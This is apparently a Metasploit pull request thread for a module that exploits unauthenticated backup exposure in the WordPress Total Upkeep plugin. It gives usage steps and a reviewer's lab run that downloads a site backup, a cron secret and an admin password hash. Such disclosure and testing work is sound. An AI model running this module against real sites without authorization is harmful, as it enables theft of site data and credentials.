Wordpress Plugin: 'Boldgrid-Backup' (Total Upkeep) backup download

[h00die]

This PR adds an exploit for Total Upkeep where the plugin exposes the name/location of backup files to unauthenticated users.
We use this to pull the backup, and attempt to find the .sql file and pull the users table.

You'll need to create a FREE account to get a serial code to make this work. Once its registered, click the button to create a backup. All these instructions are in the docs.

Verification

• Install the plugin and create a backup
• Start msfconsole
• Do: use auxiliary/scanner/http/wp_tota_upkeep_downloader
• Do: set rhosts [ip]
• Do: run
• You should get an archive backup. Possibly even auto hash extraction!

[space-r7]

Tested, and the module works great:

msf6 > use auxiliary/scanner/http/wp_total_upkeep_downloader 
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > options

Module options (auxiliary/scanner/http/wp_total_upkeep_downloader):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > set rhost 192.168.37.139
rhost => 192.168.37.139
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > run

[*] Checking /wp-content/plugins/boldgrid-backup/readme.txt
[*] Found version 1.14.9 in the plugin
[+] 192.168.37.139 - Vulnerable version detected
[*] 192.168.37.139 - Obtaining Server Info
[+] 192.168.37.139 - 
  gateway_interface: CGI/1.1
  http_host: 192.168.37.139
  php_sapi_name: apache2handler
  php_uname: Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
  php_version: 7.2.24-0ubuntu0.18.04.7
  server_addr: 192.168.37.139
  server_name: 192.168.37.139
  server_protocol: HTTP/1.1
  server_software: Apache/2.4.29 (Ubuntu)
  uid: 33
  username: www-data
[+] 192.168.37.139 - File saved in: /Users/space/.msf4/loot/20210105123656_default_192.168.37.139_boldgridbackup._565715.txt
[*] 192.168.37.139 - Obtaining Backup List from Cron
[+] 192.168.37.139 - 
  ABSPATH: /var/www/html/
  archive_key: 0
  cron_secret: 423158e2ae1bd9ec2d003c5439aca6a569896b6fda56b02d5dacb4c02f3456d0
  filepath: /var/www/html/wp-content/boldgrid_backup_CH0vvGczHiKU/boldgrid-backup-localhost-c542b19d-20210104-210305.zip
  siteurl: http://localhost
  site_title: test-site
  restore_cmd: php -d register_argc_argv="1" -qf "/var/www/html/wp-content/plugins/boldgrid-backup/boldgrid-backup-cron.php" mode=restore siteurl=http%3A%2F%2Flocalhost id=c542b19d secret=423158e2ae1bd9ec2d003c5439aca6a569896b6fda56b02d5dacb4c02f3456d0 archive_key=0 archive_filename=boldgrid-backup-localhost-c542b19d-20210104-210305.zip site_title=test-site
  timestamp: 1609794189
[+] 192.168.37.139 - File saved in: /Users/space/.msf4/loot/20210105123656_default_192.168.37.139_boldgridbackup._136894.txt
[*] 192.168.37.139 attempting download of wp-content/boldgrid_backup_CH0vvGczHiKU/boldgrid-backup-localhost-c542b19d-20210104-210305.zip
[+] 192.168.37.139 - Database backup (17853663 bytes) saved in: /Users/space/.msf4/loot/20210105123657_default_192.168.37.139_boldgridbackup._914095.zip
[*] 192.168.37.139 - Attempting to pull creds from wordpress.20210104-210305.sql
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 admin       $P$BAo3f6ta1bUpOfep/oIzHet/n8KCg01

[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test001.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test002.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test005.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test006.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test008.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test009.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test010.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test011.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test012.src.sql
[*] 192.168.37.139 - finished processing backup zip
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > creds
Credentials
===========

host  origin          service  public  private                             realm  private_type        JtR Format
----  ------          -------  ------  -------                             -----  ------------        ----------
      192.168.37.139           admin   $P$BAo3f6ta1bUpOfep/oIzHet/n8KCg01         Nonreplayable hash  phpass

[space-r7]

Release Notes

New auxiliary module auxiliary/scanner/http/wp_total_upkeep_downloader collects user creds, server info, and backup files from Wordpress via a vulnerability in the Total Upkeep plugin versions below 1.14.10.